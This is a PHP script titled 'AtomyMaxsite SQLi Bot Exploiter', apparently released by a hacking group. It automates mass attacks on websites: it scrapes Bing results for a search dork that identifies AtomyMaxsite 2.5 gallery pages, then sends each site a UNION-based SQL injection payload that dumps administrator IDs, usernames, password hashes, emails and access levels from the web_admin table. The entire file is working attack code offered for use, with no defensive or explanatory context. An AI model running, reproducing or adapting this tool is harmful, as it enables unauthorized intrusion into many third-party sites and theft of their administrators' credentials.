AtomyMaxsite SQLi Bot Exploiter

<?php
/* AZZATSSINS CYBERSERKERS
BING DORK : "Powered by : ATOMYMAXSITE 2.5" "@2010-2011" "index.php?name=gallery&op=gallery_detail&id="

*/
error_reporting(0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
echo "
############### ATOMYMAXSITE SQL BOT ###############\n
###############     AZZATSSINS       ###############
###############      T1KUS90T        ###############
";
function getsource($url,$post=null) {
        $ch = curl_init($url);
        if($post != null) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
            curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
            curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
            curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        return curl_exec($ch);
            curl_close($ch);
    }
    function ngcurl($site) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $site);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $res = curl_exec($ch);
        curl_close($ch);
        return $res;
    }
    echo "\nDork Bing: ";$dork=trim(fgets(STDIN,1024));
$do=urlencode($dork);
        $npage = 1;
        $npages = 30000;
        $allLinks = array();
        $lll = array();
        while($npage <= $npages) {
            $x = getsource("http://www.bing.com/search?q=".$do."&first=" . $npage."&FORM=PERE4");
            if ($x) {
                preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
                foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
                $npage = $npage + 10;
                if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
            } else break;
        }
        $URLs = array();
        foreach($allLinks as $url){
            $exp = explode("/", $url);
            $URLs[] = $exp[2];
        }
        $array = array_filter($URLs);
        $array = array_unique($array);
        $sss=count(array_unique($array));
                echo"\nReady to fuck ". $sss." site";

        foreach ($array as $domain) {
        $_SESSION[$domain] = "1";
        $domain1 = "http://$domain";
        $domain_exploit = $domain1."/index.php?name=gallery&op=gallery_detail&id=1";
$target = $domain_exploit;
    $payload = "'+and+0+union+select+1,2,group_concat(id,0x3a,username,0x3a,password,0x3a,email,0x3a,level),4,5+from+web_admin--+-";
    $connect = ngcurl(trim(preg_replace('/\s\s+/', '',$target.$payload)));
    preg_match_all('/<font size="2">(.*)<\/font>/', $connect, $matches);
    echo "\n[+] Dumped Data : \n";
    if(strpos($matches[0][0], ':') !== false) {
        foreach ($matches[0] as $a) {
            $a = str_replace('<font size="2">', '', $a);
            $a = str_replace('</font>', '', $a);
            $pecah1 = explode(',', $a);
            foreach ($pecah1 as $res1) {
                $pecah2 = explode(':', $res1);
                echo "    [+]Site\t : ".$domain1."\n";
                echo "    [+]id\t : ".$pecah2[0]."\n";
                echo "      [-]user\t : ".$pecah2[1]."\n";
                echo "      [-]pass\t : ".$pecah2[2]."\n";
                echo "      [-]email\t : ".$pecah2[3]."\n";
                echo "      [-]level\t : ".$pecah2[4]."\n\n";
            }
        }
    } else {
                echo "    [+]Site\t : ".$domain1."\n";
                echo "    [+]\tNot Vulnerable :P\n";
    }


    echo "\n";
    }